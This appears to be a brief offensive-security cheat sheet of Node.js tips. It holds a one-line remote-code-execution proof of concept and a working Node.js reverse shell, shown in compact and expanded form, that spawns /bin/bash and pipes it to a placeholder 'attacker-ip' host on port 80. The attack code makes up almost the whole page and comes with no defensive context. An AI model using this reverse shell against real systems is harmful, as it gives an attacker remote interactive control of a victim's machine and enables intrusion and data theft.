Skip to content

Node JS Tips #

Whitebox RCE POC #

1
require('util').log('SUCCESSFUL_CODE_EXECUTION');

Reverse shell #

  • Few lines 
    1
2
3
4
    var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(80, "attacker-ip", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});
  • Expanded: 
     1
 2
 3
 4
 5
 6
 7
 8
 9
10
    var net = require("net"),
sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(80, "attacker-ip", function()
  {
    client.pipe(sh.stdin);
    sh.stdout.pipe(client);
    sh.stderr.pipe(client);
  }
);

Javascript Escaping1 #

  1. JS Escapes @mathias 

Last update: May 17, 2021